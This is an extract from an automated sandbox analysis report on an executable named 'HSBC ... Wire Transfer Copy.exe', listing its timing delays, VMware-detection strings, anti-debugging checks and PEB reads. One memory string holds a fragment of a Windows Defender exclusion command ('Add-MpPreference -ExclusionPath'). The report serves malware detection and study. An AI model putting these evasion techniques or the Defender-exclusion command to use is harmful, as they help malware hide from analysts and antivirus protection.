Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238343			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 238000			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 237203			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 236703			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 236534			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 236406			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1
Source: explorer.exe, 0000000C.00000000.303809038.000000000EE50000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000C.00000000.335138574.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000C.00000000.330618506.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000C.00000000.301310176.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Enables debug privileges

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162C962 mov eax, dword ptr fs:[00000030h]		6_2_0162C962
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]		6_2_0162B171
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162B171 mov eax, dword ptr fs:[00000030h]		6_2_0162B171
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]		6_2_0164B944
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164B944 mov eax, dword ptr fs:[00000030h]		6_2_0164B944
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]		6_2_01644120
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]		6_2_01644120
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]		6_2_01644120
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01644120 mov eax, dword ptr fs:[00000030h]		6_2_01644120
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01644120 mov ecx, dword ptr fs:[00000030h]		6_2_01644120
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]		6_2_0165513A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165513A mov eax, dword ptr fs:[00000030h]		6_2_0165513A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]		6_2_01629100
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]		6_2_01629100
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629100 mov eax, dword ptr fs:[00000030h]		6_2_01629100
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016B41E8 mov eax, dword ptr fs:[00000030h]		6_2_016B41E8
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]		6_2_0162B1E1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]		6_2_0162B1E1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162B1E1 mov eax, dword ptr fs:[00000030h]		6_2_0162B1E1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]		6_2_016561A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016561A0 mov eax, dword ptr fs:[00000030h]		6_2_016561A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]		6_2_016E49A4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]		6_2_016E49A4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]		6_2_016E49A4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E49A4 mov eax, dword ptr fs:[00000030h]		6_2_016E49A4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A69A6 mov eax, dword ptr fs:[00000030h]		6_2_016A69A6
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]		6_2_016A51BE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]		6_2_016A51BE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]		6_2_016A51BE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A51BE mov eax, dword ptr fs:[00000030h]		6_2_016A51BE
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov ecx, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016499BF mov eax, dword ptr fs:[00000030h]		6_2_016499BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165A185 mov eax, dword ptr fs:[00000030h]		6_2_0165A185
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164C182 mov eax, dword ptr fs:[00000030h]		6_2_0164C182
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652990 mov eax, dword ptr fs:[00000030h]		6_2_01652990
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F1074 mov eax, dword ptr fs:[00000030h]		6_2_016F1074
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E2073 mov eax, dword ptr fs:[00000030h]		6_2_016E2073
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]		6_2_01640050
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01640050 mov eax, dword ptr fs:[00000030h]		6_2_01640050
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]		6_2_0165002D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]		6_2_0165002D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]		6_2_0165002D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]		6_2_0165002D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165002D mov eax, dword ptr fs:[00000030h]		6_2_0165002D
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]		6_2_0163B02A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]		6_2_0163B02A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]		6_2_0163B02A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0163B02A mov eax, dword ptr fs:[00000030h]		6_2_0163B02A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]		6_2_0164A830
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]		6_2_0164A830
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]		6_2_0164A830
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A830 mov eax, dword ptr fs:[00000030h]		6_2_0164A830
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]		6_2_016F4015
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F4015 mov eax, dword ptr fs:[00000030h]		6_2_016F4015
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]		6_2_016A7016
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]		6_2_016A7016
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A7016 mov eax, dword ptr fs:[00000030h]		6_2_016A7016
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]		6_2_0164B8E4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164B8E4 mov eax, dword ptr fs:[00000030h]		6_2_0164B8E4
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]		6_2_016240E1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]		6_2_016240E1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016240E1 mov eax, dword ptr fs:[00000030h]		6_2_016240E1
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016258EC mov eax, dword ptr fs:[00000030h]		6_2_016258EC
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]		6_2_016BB8D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BB8D0 mov ecx, dword ptr fs:[00000030h]		6_2_016BB8D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]		6_2_016BB8D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]		6_2_016BB8D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]		6_2_016BB8D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016BB8D0 mov eax, dword ptr fs:[00000030h]		6_2_016BB8D0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016520A0 mov eax, dword ptr fs:[00000030h]		6_2_016520A0
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016690AF mov eax, dword ptr fs:[00000030h]		6_2_016690AF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165F0BF mov ecx, dword ptr fs:[00000030h]		6_2_0165F0BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]		6_2_0165F0BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165F0BF mov eax, dword ptr fs:[00000030h]		6_2_0165F0BF
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629080 mov eax, dword ptr fs:[00000030h]		6_2_01629080
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]		6_2_016A3884
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A3884 mov eax, dword ptr fs:[00000030h]		6_2_016A3884
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162DB60 mov ecx, dword ptr fs:[00000030h]		6_2_0162DB60
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]		6_2_01653B7A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01653B7A mov eax, dword ptr fs:[00000030h]		6_2_01653B7A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162DB40 mov eax, dword ptr fs:[00000030h]		6_2_0162DB40
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F8B58 mov eax, dword ptr fs:[00000030h]		6_2_016F8B58
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0162F358 mov eax, dword ptr fs:[00000030h]		6_2_0162F358
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164A309 mov eax, dword ptr fs:[00000030h]		6_2_0164A309
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E131B mov eax, dword ptr fs:[00000030h]		6_2_016E131B
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]		6_2_016503E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]		6_2_016503E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]		6_2_016503E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]		6_2_016503E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]		6_2_016503E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016503E2 mov eax, dword ptr fs:[00000030h]		6_2_016503E2
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0164DBE9 mov eax, dword ptr fs:[00000030h]		6_2_0164DBE9
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]		6_2_016D23E3
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016D23E3 mov ecx, dword ptr fs:[00000030h]		6_2_016D23E3
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016D23E3 mov eax, dword ptr fs:[00000030h]		6_2_016D23E3
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]		6_2_016A53CA
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016A53CA mov eax, dword ptr fs:[00000030h]		6_2_016A53CA
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]		6_2_01654BAD
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]		6_2_01654BAD
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01654BAD mov eax, dword ptr fs:[00000030h]		6_2_01654BAD
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F5BA5 mov eax, dword ptr fs:[00000030h]		6_2_016F5BA5
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016E138A mov eax, dword ptr fs:[00000030h]		6_2_016E138A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]		6_2_01631B8F
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01631B8F mov eax, dword ptr fs:[00000030h]		6_2_01631B8F
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016DD380 mov ecx, dword ptr fs:[00000030h]		6_2_016DD380
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01652397 mov eax, dword ptr fs:[00000030h]		6_2_01652397
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0165B390 mov eax, dword ptr fs:[00000030h]		6_2_0165B390
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]		6_2_016DB260
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016DB260 mov eax, dword ptr fs:[00000030h]		6_2_016DB260
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016F8A62 mov eax, dword ptr fs:[00000030h]		6_2_016F8A62
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_0166927A mov eax, dword ptr fs:[00000030h]		6_2_0166927A
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]		6_2_01629240
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]		6_2_01629240
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]		6_2_01629240
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01629240 mov eax, dword ptr fs:[00000030h]		6_2_01629240
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016EEA55 mov eax, dword ptr fs:[00000030h]		6_2_016EEA55
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_016B4257 mov eax, dword ptr fs:[00000030h]		6_2_016B4257
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Code function: 6_2_01664A2C mov eax, dword ptr fs:[00000030h]		6_2_01664A2C
